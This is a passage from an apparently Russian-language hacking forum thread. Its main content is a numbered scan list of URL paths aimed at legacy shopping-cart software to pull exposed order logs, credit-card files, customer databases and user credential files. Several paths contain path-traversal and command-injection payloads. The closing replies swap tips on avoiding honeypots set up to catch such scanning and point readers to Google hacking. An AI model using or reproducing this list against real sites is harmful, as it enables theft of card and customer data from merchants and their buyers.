401. /scripts/weblog

402. /fpdb/shopping400.mdb

403. /htbin/shop/orders/orders.txt

404. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log

405. /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log

406. /mall_log_files/

407. /cgi-bin/perlshop.cgi

408. /tienda/shopdbtest.asp

409. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb

410. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log

411. /WebShop/logs/ck.log

412. /fpdb/shopping300.mdb

413. /mysql/store.mdb

414. /cgi-bin/store/Admin_files/commerce_user_lib.pl

415. /config.dat

416. /order/order.log

417. /commerce_user_lib.pl

418. /Admin_files/AuthorizeNet_user_lib.pl

419. /cvv2.asp

420. /cgi-bin/cart32/CART32-order.txt

421. /wwwlog

422. /cool-logs/mlog.html

423. /cgi-bin/pass/merchant.cgi.log

424. /cgi-local/pagelog.cgi

425. /cgi-bin/pagelog.cgi

426. /cgi-bin/orders/cc.txt

427. /cgis/shop/orders/orders.txt

428. /admin/admin_conf.pl

429. /cgi-bin/pdg_cart/order.log

430. /cgi/PDG_Cart/order.log

431. /Admin_files/ccelog.txt

432. /cgi-bin/orders/mc.txt

433. /cgi/cart32.exe

434. /ecommerce/admin/admin.asp

435. /scripts/DCShop/auth_data/auth_user_file.txt

436. /Catalog/config/datasources/Expire.mdb

437. /ecommerce/admin/shopdbtest.asp

438. /mysql/mystore.mdb

439. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp

440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

441. /cgi-bin/Count.cgi?df=callcard.dat

442. /logfiles/

443. /shopping/shopping350.mdb

444. /admin/configuration.pl

445. /cgis/DCShop/auth_data/auth_user_file.txt

446. /cgis/cart32.exe

447. /cgi-bin/dcshop.cgi

448. /cgi-win/shop/auth_data/auth_user_file.txt

449. /shopping400.mdb

450. /HBill/config

451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log

452. /search=action&keywords=GSD%20&template=order.log

453. /WebCart/orders.txt

454. /PDG_Cart/authorizenets.txt

455. /cgi-bin/AnyForm2

456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat

457. /cgi-bin/PDG_Cart/order.log

458. /expire.mdb

459. /logger/

460. /webcart-lite/orders/import.txt

461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

462. /cgi-bin/PDG_Cart/shopper.conf

463. /cgi-bin/cart32.exe

464. /dc/orders/orders.txt

465. /cgi-local/DCShop/orders/orders.txt

466. /shop.pl/page=shop.cfg

467. /cgi-local/cart32.exe

468. /cgi-win/pagelog.cgi

469. /cgi-win/shop/orders/orders.txt

470. /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv

471. /cgi-sys/DCShop/auth_data/auth_user_file.txt

472. /cgi-bin/www-sql;;;

473. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log

474. /scripts/orders/orders.txt

475. /cgi-local/shop.pl/shop.cfg

476. /search=action&keywords=cwtb%20&template=expire.mdb

477. /php/mylog.phtml

478. /config/datasources/shopping.mdb

479. /php-coolfile/action.php?action=edit&file=config.php

480. /cgi-bin/ezmall2000/mall2000.cgi

481. /cgi/DCShop/orders/orders.txt

482. /cgi-local/shop.pl

483. /cgis/DCShop/orders/orders.txt

484. /product/shopdbtest.asp

485. /ASP/cart/database/metacart.mdb

486. /cgi-bin/cgi-lib.pl

487. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html

488. /search=action&keywords=cwtb%20&template=order.log

489. /mysql/expire.mdb

490. /scripts/shop/auth_data/auth_user_file.txt

491. /cgi-bin/cart32/whatever-OUTPUT.txt

492. /Shopping%20Cart/shopdbtest.asp

493. /cgi/shop/auth_data/auth_user_file.txt

494. /shop/shopping350.mdb

495. /cgi-bin/store/Authorize_Net.pl

496. /scripts/DCShop/orders/orders.txt

497. /store/log_files/commerce_user_lib.pl

498. /shopping/shopadmin.asp

499. /cgi-bin/orderlog.txt

500. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&amp;amp;NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;

501. /cool-logs/mylog.html

502. /cgibin/shop.pl/page=;cat%20shop.pl

503. /htbin/shop.pl/page=;cat%20shop.pl

504. /cgi-win/orders/orders.txt

505. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt

506. /SHOP/shopdbtest.asp

507. /cgi/pagelog.cgi

508. /php/mlog.phtml

509. /cgi-bin/shop/apdproducts.mdb

510. /htbin/shop/auth_data/auth_user_file.txt

511. /server%20logfile;;;

512. /database/metacart.mdb

513. /cgi-local/shop/orders/orders.txt

я уже 2 раза на honeypot нарвался! поаккуратнее юзайте!

Цитата:

Сообщение от Фещ

я уже 2 раза на honeypot нарвался! поаккуратнее юзайте!

Да "меда" действительно много :)
В большинстве своем ханипоты выдают себя изобилием "дыр", если перед твоим взором предстали файлы: password.txt, passwd, admin_password, users.txt (в пределах одной диры) и т.д. можешь быть уверен на 100% это ханипот :)

Зря стараетесь, все ето уже давно до вас собрано.
смотреть всем гугл хакерам